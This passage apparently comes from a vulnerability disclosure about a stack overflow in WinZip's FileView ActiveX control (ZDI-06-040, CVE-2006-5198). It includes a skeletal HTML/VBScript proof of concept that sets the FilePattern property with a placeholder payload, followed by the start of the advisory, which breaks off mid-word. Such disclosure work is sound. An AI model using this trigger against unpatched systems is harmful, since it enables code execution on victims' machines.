7245 correctly resolves this issue; standard stack
overflow in WZFILEVIEW.FilePattern snatching EIP; PoC
below;
HTML
HEAD
TITLE/TITLE
/HEAD
BODY
SCRIPT LANGUAGE=VBScript
!--
Sub WZFILEVIEW_OnAfterItemAdd(Item)
WZFILEVIEW.FilePattern = SMASHTHESTACKHERE
end sub
--
/SCRIPT
OBJECT
ZDI-06-040: WinZip FileView ActiveX Control Unsafe Method Exposure
Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-06-040.html
November 14, 2006
-- CVE ID:
CVE-2006-5198
-- Affected Vendor:
WinZip
-- Affected Products:
WinZip 10.0 (pre build 7245)
-- TippingPoint(TM
